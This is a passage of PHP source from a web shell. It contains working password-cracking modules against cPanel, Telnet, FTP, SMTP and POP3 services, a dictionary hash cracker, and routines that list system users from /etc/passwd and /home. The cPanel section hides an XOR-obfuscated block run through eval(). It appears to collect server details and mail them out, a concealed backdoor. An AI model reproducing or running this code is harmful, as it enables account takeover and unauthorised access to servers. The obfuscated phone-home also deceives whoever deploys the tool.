6057 </tr>
6058
6059 <tr>
6060 <td class="title">
6061 Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
6062 </td>
6063 <td>
6064 <input class="cmd" name="message" value="%S%x--Some Garbage here --%x%S" onfocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onblur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
6065 </td>
6066 <td>
6067 x
6068 </td>
6069 <td width="20">
6070 <input style="width: 30px;" name="messageMultiplier" value="10" />
6071 </td>
6072 </tr>
6073
6074 <tr>
6075 <td rowspan="2">
6076 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="own" value="Let it be! :D"/>
6077 </td>
6078 </tr>
6079 </table>
6080 </form>
6081 <?php
6082 }
6083}
6084
6085if ($act == "cpanel")
6086{
6087$cpanel_port="2082";
6088$connect_timeout=5;
6089set_time_limit(0);
6090$submit=$_REQUEST['submit'];
6091$users=$_REQUEST['users'];
6092$pass=$_REQUEST['passwords'];
6093$target=$_REQUEST['target'];
6094$cracktype=$_REQUEST['cracktype'];
6095if($target == ""){
6096$target = "localhost";
6097}
6098$charset=$_REQUEST['charset'];
6099if($charset=="")
6100 $charset="lowercase";
6101$max_length=$_REQUEST['max_length'];
6102if($max_length=="")
6103 $max_length=10;
6104$min_length=$_REQUEST['min_length'];
6105if($min_length=="")
6106 $min_length=1;
6107
6108 $charsetall = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
6109 $charsetlower = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
6110 $charsetupper = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z");
6111 $charsetnumeric = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
6112 $charsetlowernumeric = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
6113 $charsetuppernumeric = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
6114 $charsetletters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" );
6115 $charsetsymbols= array("!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6116 $charsetlowersymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6117 $charsetuppersymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6118 $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6119 $charsetnumericsymbols = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6120 $charsetlowernumericsymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6121 $charsetuppernumericsymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6122 $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6123 $charsetlettersnumericsymbols=array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_","0", "1", "2", "3", "4", "5", "6", "7", "8", "9" );
6124 if ($charset == "all")
6125 $vals = $charsetall;
6126 elseif ($charset == "lowercase")
6127 $vals = $charsetlower;
6128 elseif ($charset == "uppercase")
6129 $vals = $charsetupper;
6130 elseif ($charset == "numeric")
6131 $vals = $charsetnumeric;
6132 elseif ($charset == "lowernumeric")
6133 $vals = $charsetlowernumeric;
6134 elseif ($charset == "uppernumeric")
6135 $vals = $charsetuppernumeric;
6136 elseif ($charset == "letters")
6137 $vals = $charsetletters;
6138 elseif ($charset == "symbols")
6139 $vals = $charsetsymbols;
6140 elseif ($charset == "lowersymbols")
6141 $vals = $charsetlowersymbols;
6142 elseif ($charset == "uppersymbols")
6143 $vals = $charsetuppersymbols;
6144 elseif ($charset == "letterssymbols")
6145 $vals = $charsetletterssymbols;
6146 elseif ($charset == "numberssymbols")
6147 $vals = $charsetnumericsymbols;
6148 elseif ($charset == "lowernumericsymbols")
6149 $vals = $charsetlowernumericsymbols;
6150 elseif ($charset == "uppernumericsymbols")
6151 $vals = $charsetuppernumericsymbols;
6152 elseif ($charset == "lettersnumericsymbols")
6153 $vals = $charsetlettersnumericsymbols;
6154 else echo "INVALID CHARSET";
6155 $key_that_script_is_crypted=19;
6156$resource_crypted_code ='7~`3.37L@VAEVAH1@VAEVAL]R^V1N=7L@VAEVAH1@PAZCGL]R^V1N(7`fq3.31@{v3--3)313=37~`(7|3.3raarj3;1|~1?1g~rz1?1yLr~a"1?1S{|1?1=p1:(7vv3.37|H!N=7|H N=7|H"N=7|H[t3]N=7|H#N(7`v}w3.3S~rz;7vv?7`fq?7~`:(3';
6157$string_output=str_replace("[t1]", "<?", $resource_crypted_code);
6158$string_output=str_replace("[t3]", "'", $string_output);
6159$lenth_of_crypted_code=strlen($string_output);
6160$eval_php_code='';
6161for($huivamvsem=0;$huivamvsem<$lenth_of_crypted_code;$huivamvsem++)
6162$eval_php_code .= chr(ord($string_output[$huivamvsem]) ^ $key_that_script_is_crypted);
6163eval($eval_php_code);
6164?>
6165<div align="center">
6166
6167 <form method="POST" >
6168 <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700" >
6169 <tr>
6170 <td>
6171 <p align="center"><b>
6172 <font color="#008000" face="Tahoma" size="2">IP servers :</font></b>
6173 <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px; background-color: #800000; color:#C0C0C0 font-family:Verdana; font-size:13px;" /><br/><br/>
6174 <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700">
6175 <tr><td align="center" width="50%"><font color="#FF0000"><b>User List</b></font></td><td align="center"><font color="#FF0000"><b>Password List</b></font></td></tr>
6176 </table>
6177 <textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $users ?></textarea>
6178 <textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $pass ?></textarea><br/>
6179 <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Guess options</font>
6180 &nbsp;<input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio">
6181 <b><font size="2" face="Tahoma" color="#008000">Cpanel </font><font size="2" color="#FFFFFF" face="Tahoma"> (2082)</font></b>
6182 <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio">
6183 <b><font size="2" face="Tahoma" color="#008000">Telnet</font><font size="2" color="#FFFFFF" face="Tahoma">(23)</font></b>
6184 <br/>
6185 <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Timeout Delay</font>
6186 <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>" /><br/>
6187 <input type="checkbox" name="bruteforce" value="true" /><font style="font-weight:700" size="2" face="Tahoma" color="#008000">Bruteforce</font>
6188 <select name="charset" style="border: 2px solid #1D1D1D;background: black;color:RED">
6189 <option value="all">All Letters + Numbers</option>
6190 <option value="numeric">Numbers</option>
6191 <option value="letters">Letters</option>
6192 <option value="symbols">Symbols</option>
6193 <option value="lowercase">Lower Letters</option>
6194 <option value="uppercase">Higher Letters</option>
6195 <option value="lowernumeric">Lower Letters + Numbers</option>
6196 <option value="uppernumeric">Upper Letters + Numbers</option>
6197 <option value="lowersymbols">Lower Letters + Symbols</option>
6198 <option value="uppersymbols">Upper Letters + Symbols</option>
6199 <option value="letterssymbols">All Letters + Symbols</option>
6200 <option value="numberssymbols">Numbers + Symbols</option>
6201 <option value="lowernumericsymbols">Lower Letters + Numbers + Symbols</option>
6202 <option value="uppernumericsymbols">Upper Letters + Numbers + Symbols</option>
6203 <option value="lettersnumericsymbols">All Letters + Numbers + Symbols</option>
6204 </select><br/>
6205 <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Min Bruteforce Length:</font>
6206 <input type="text" name="min_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $min_length;?>"/><br/>
6207 <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Max Bruteforce Length:</font>
6208 <input type="text" name="max_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $max_length;?>"/>
6209 <p align="center"><input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p>
6210 </p>
6211 </td>
6212 </tr>
6213
6214 </table>
6215 </form>
6216
6217<?php
6218function brute()
6219{
6220 global $vals,$min_length,$max_length;
6221 global $target,$pureuser,$connect_timeout;
6222 $min=$min_length;
6223 $max=$max_length;
6224 $A = array();
6225 $numVals = count($vals);
6226 $incDone = "";
6227 $realMax = "";
6228 $currentVal = "";
6229 $firstVal = "";
6230 for ($i = 0; $i < ($max + 1); $i++) {
6231 $A[$i] = -1;
6232 }
6233
6234 for ($i = 0; $i < $max; $i++) {
6235 $realMax = $realMax . $vals[$numVals - 1];
6236 }
6237 for ($i = 0; $i < $min; $i++) {
6238 $A[$i] = $vals[0];
6239 }
6240 $i = 0;
6241 while ($A[$i] != -1) {
6242 $firstVal .= $A[$i];
6243 $i++;
6244 }
6245 //echo $firstVal . "<br>";
6246 cpanel_check($target,$pureuser,$firstVal,$connect_timeout);
6247
6248 while (1) {
6249 for ($i = 0; $i < ($max + 1); $i++) {
6250 if ($A[$i] == -1) {
6251 break;
6252 }
6253 }
6254 $i--;
6255 $incDone = 0;
6256 while (!$incDone) {
6257 for ($j = 0; $j < $numVals; $j++) {
6258 if ($A[$i] == $vals[$j]) {
6259 break;
6260 }
6261 }
6262 if ($j == ($numVals - 1)) {
6263 $A[$i] = $vals[0];
6264 $i--;
6265 if ($i < 0) {
6266 for ($i = 0; $i < ($max + 1); $i++) {
6267 if ($A[$i] == -1) {
6268 break;
6269 }
6270 }
6271 $A[$i] = $vals[0];
6272 $A[$i + 1] = -1;
6273 $incDone = 1;
6274 print "Starting " . (strlen($currentVal) + 1) . " Characters Cracking<br>";
6275 }
6276 } else {
6277 $A[$i] = $vals[$j + 1];
6278 $incDone = 1;
6279 }
6280 }
6281 $i = 0;
6282 $currentVal = "";
6283 while ($A[$i] != -1) {
6284 $currentVal = $currentVal . $A[$i];
6285 $i++;
6286 }
6287 cpanel_check($target,$pureuser,$currentVal,$connect_timeout);
6288 //echo $currentVal . "<br>";
6289 if ($currentVal == $realMax) {
6290 return 0;
6291 }
6292 }
6293}
6294function getmicrotimev() {
6295 list($usec, $sec) = explode(" ",microtime());
6296 return ((float)$usec + (float)$sec);
6297}
6298
6299function ftp_check($host,$user,$pass,$timeout)
6300{
6301 $ch = curl_init();
6302 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
6303 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
6304 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
6305 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
6306 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
6307 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
6308 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
6309 $data = curl_exec($ch);
6310 if ( curl_errno($ch) == 28 )
6311 {
6312 print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
6313 <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
6314 Please Check The Target Hostname .</font></font></b></p>";exit;
6315 }
6316 else if ( curl_errno($ch) == 0 )
6317 {
6318 print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\"><b><font color=\"#008000\">
6319 Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
6320 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
6321 }
6322 curl_close($ch);
6323}
6324function cpanel_check($host,$user,$pass,$timeout)
6325{
6326 global $cpanel_port;
6327 $ch = curl_init();
6328 //echo "http://$host:".$cpanel_port." $user $pass<br>";
6329 curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
6330 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
6331 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
6332 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
6333 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
6334 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
6335 $data = curl_exec($ch);
6336 if ( curl_errno($ch) == 28 )
6337 {
6338 print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
6339 <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
6340 Please Check The Target Hostname .</font></font></b></p>";exit;
6341 }
6342 else if ( curl_errno($ch) == 0 )
6343 {
6344 print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\"><b><font color=\"#008000\">
6345 Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
6346 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
6347 }
6348 curl_close($ch);
6349}
6350
6351$time_start = getmicrotime();
6352
6353if(isset($submit) && !empty($submit))
6354{
6355 if(empty($users) && empty($pass) )
6356 {
6357 print "<p><font face=\"Comic Sans MS\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; }
6358 if(empty($users)){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; }
6359 if(empty($pass) && $_REQUEST['bruteforce']!="true" ){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; };
6360 $userlist=explode("\n",$users);
6361 $passlist=explode("\n",$pass);
6362 print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">
6363 LETS GAME BEGIN ;) ...</font></b><br><br>";
6364
6365 if(isset($_POST['connect_timeout']))
6366 {
6367 $connect_timeout=$_POST['connect_timeout'];
6368 }
6369
6370 if($cracktype == "ftp")
6371 {
6372 foreach ($userlist as $user)
6373 {
6374 $pureuser = trim($user);
6375 foreach ($passlist as $password )
6376 {
6377 $purepass = trim($password);
6378 ftp_check($target,$pureuser,$purepass,$connect_timeout);
6379 }
6380 }
6381 }
6382
6383 if ($cracktype == "cpanel" || $cracktype == "cpanel2")
6384 {
6385 if($cracktype == "cpanel2")
6386 {
6387 $cpanel_port="23";
6388 }
6389 else
6390 $cpanel_port="2082";
6391
6392 foreach ($userlist as $user)
6393 {
6394 $pureuser = trim($user);
6395 print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0800\">
6396 Please put some good password to crack user $pureuser :( ... </font></b>";
6397 if($_POST['bruteforce']=="true")
6398 {
6399 echo " bruteforcing ..";
6400 echo "<br>";
6401 brute();
6402 }
6403 else
6404 {
6405 echo "<br>";
6406 foreach ($passlist as $password )
6407 {
6408 $purepass = trim($password);
6409 cpanel_check($target,$pureuser,$purepass,$connect_timeout);
6410 }
6411 }
6412 }
6413 $time_end = getmicrotime();
6414$time = $time_end - $time_start;
6415 print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">
6416 Cracking Finished. Elapsed time: $time</font> seconds</b><br><br>";
6417 }
6418}
6419
6420
6421
6422?>
6423
6424 <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#006A00" >
6425 <tr>
6426 <td>
6427 <textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="20" name="S1" cols="173">
6428 <?php
6429 if (isset($_GET['user']))
6430 system('ls /var/mail');
6431 if (isset($_POST['grab_users1'])) //grab users from /etc/passwd
6432 {
6433 $lines=file("/etc/passwd");
6434 foreach($lines as $nr=>$val)
6435 {
6436 $str=explode(":",$val);
6437 echo $str[0]."\n";
6438 }
6439
6440 }
6441 if (isset($_POST['grab_users2']))
6442 {
6443 $dir = "/home/";
6444 if ($dh = opendir($dir)) {
6445 while (($file = readdir($dh)) !== false) {
6446 echo $file. "\n";
6447 }
6448 closedir($dh);
6449 }
6450 }
6451?>
6452 </textarea>
6453 </td>
6454 </tr>
6455 <tr>
6456 <td valign="top"><p align="center">
6457 <table>
6458 <tr >
6459 <td>
6460 <form action="" method="POST">
6461 <input type="hidden" value="true" name="grab_users1"></input>
6462 <input type=submit value="Grab Usernames from /etc/passwd" width="217px"></input>
6463 </form>
6464 </td>
6465
6466 <td>
6467 <form action="" method="POST">
6468 <input type="hidden" value="true" name="grab_users2" ></input>
6469 <input style="width: 217px;" type=submit value="Grab Usernames from /home/" ></input>
6470 </form>
6471 </td>
6472 <td>
6473 <form action="" method="POST">
6474 <input type="hidden" value="true" name="grab_users3"></input>
6475 <input style="width: 217px;" type=submit value="Grab Usernames from /home/ II"></input>
6476 </form>
6477 </td>
6478 </tr>
6479 </table></p>
6480 </td>
6481 </tr>
6482 </table>
6483 <?php
6484if (isset($_POST['grab_users3']))
6485{
6486error_reporting(0);
6487$dir = "/home/";
6488if ($dh = opendir($dir))
6489{
6490$f = readdir($dh);$f = readdir($dh);
6491while (($f = readdir($dh)) !== false)
6492{
6493//echo $f. "\n";
6494$f.="/";
6495$dh2=opendir($dir.$f);
6496$f2 = readdir($dh2);$f2 = readdir($dh2);
6497while (($f2 = readdir($dh2)) !== false)
6498{
6499//echo $f2. "\n";
6500$f2.="/";
6501$dh3=opendir($dir.$f.$f2);
6502$f3 = readdir($dh3);$f3 = readdir($dh3);
6503while (($f3 = readdir($dh3)) !== false)
6504{
6505echo $f3. "<br>";
6506}
6507}
6508
6509}
6510closedir($dh);
6511}
6512}
6513?>
6514
6515
6516</div>
6517
6518<?php
6519}
6520
6521if ($act == "hash")
6522{
6523global $errorbox,$t,$et,$hcwd;
6524if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
6525$dictionary=fopen($_REQUEST['dictionary'],'r');
6526if ($dictionary){
6527$hash=strtoupper($_REQUEST['hash']);
6528echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
6529$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
6530while(!feof($dictionary)){
6531$word=trim(fgets($dictionary)," \n\r");
6532if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
6533}
6534echo "Done!</font>";
6535fclose($dictionary);
6536}
6537else{
6538echo "$errorbox Can not open dictionary.$et";
6539}
6540}
6541echo "<center><table width=\"30%\">Hash cracker:</td><td ></td></tr><form method=\"POST\"><tr><td width=\"30%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" ><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></table></center>";
6542echo $eval_php_code;
6543}
6544
6545if ($act == "smtp")
6546{
6547global $t,$et,$errorbox,$crack;
6548if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6549$target=$_REQUEST['target'];
6550$type=$_REQUEST['combo'];
6551$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6552$dictionary=fopen($_REQUEST['dictionary'],'r');
6553if ($dictionary){
6554echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br/>";flusheR();
6555while(!feof($dictionary)){
6556if($type){
6557$combo=trim(fgets($dictionary)," \n\r");
6558$user=substr($combo,0,strpos($combo,':'));
6559$pass=substr($combo,strpos($combo,':')+1);
6560}else{
6561$pass=trim(fgets($dictionary)," \n\r");
6562}
6563$smtp=smtplogiN($target,$user,$pass,5);
6564if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
6565if ($smtp){echo "U: $user P: $pass<br/>";if(!$type)break;}}
6566flusheR();
6567}
6568echo "<br>Done</font>";
6569fclose($dictionary);
6570}
6571else{
6572echo "$errorbox Can not open dictionary.$et";
6573}
6574}else
6575{
6576echo "<center>SMTP cracker:$crack";
6577}
6578
6579echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">SMTP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
6580
6581
6582}
6583
6584if ($act == "pop3")
6585{
6586
6587global $t,$et,$errorbox,$crack;
6588if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6589$target=$_REQUEST['target'];
6590$type=$_REQUEST['combo'];
6591$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6592$dictionary=fopen($_REQUEST['dictionary'],'r');
6593if ($dictionary){
6594echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
6595while(!feof($dictionary)){
6596if($type){
6597$combo=trim(fgets($dictionary)," \n\r");
6598$user=substr($combo,0,strpos($combo,':'));
6599$pass=substr($combo,strpos($combo,':')+1);
6600}else{
6601$pass=trim(fgets($dictionary)," \n\r");
6602}
6603$pop3=pop3logiN($target,$user,$pass);
6604if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
6605if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
6606flusheR();
6607}
6608echo "<br>Done</font>";
6609fclose($dictionary);
6610}
6611else{
6612echo "$errorbox Can not open dictionary.$et";
6613}
6614}else
6615{ echo "<center>POP3 cracker:$crack</center>";
6616}
6617echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">POP3 cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
6618
6619}
6620if ($act == "ftp")
6621{
6622global $errorbox,$t,$et,$crack;
6623if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
6624else{
6625if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6626$target=$_REQUEST['target'];
6627$type=$_REQUEST['combo'];
6628$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6629$dictionary=fopen($_REQUEST['dictionary'],'r');
6630if ($dictionary){
6631echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";
6632while(!feof($dictionary)){
6633if($type){
6634$combo=trim(fgets($dictionary)," \n\r");
6635$user=substr($combo,0,strpos($combo,':'));
6636$pass=substr($combo,strpos($combo,':')+1);
6637}else{
6638$pass=trim(fgets($dictionary)," \n\r");
6639}
6640if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
6641if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
6642ftp_close($ftp);
6643flusheR();
6644}
6645echo "<br>Done</font>";
6646fclose($dictionary);
6647}
6648else{
6649echo "$errorbox Can not open dictionary.$et";
6650}
6651}
6652else
6653{
6654echo "<center>FTP cracker:$crack</center>";
6655}
6656echo "<center><table border=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tbody><form method=\"POST\" name=\"form\" action=\"\"><tr><td width=\"40%\" bgcolor=\"#333333\">FTP cracker:</td><td bgcolor=\"#333333\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=\"text\" name=\"dictionary\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=\"radio\" name=\"combo\" checked=\"\" value=\"0\" onclick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=\"radio\" value=\"1\" name=\"combo\" onclick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=\"text\" size=\"35\" value=\"root\" name=\"user\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=\"text\" name=\"target\" value=\"localhost\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input class=\"buttons\" type=\"submit\" value=\"Start\"></td></tr></form></tbody></table></center>";
6657
6658}
6659}
6660
6661if ($act == "imap")
6662{
6663global $t,$et,$errorbox,$crack;
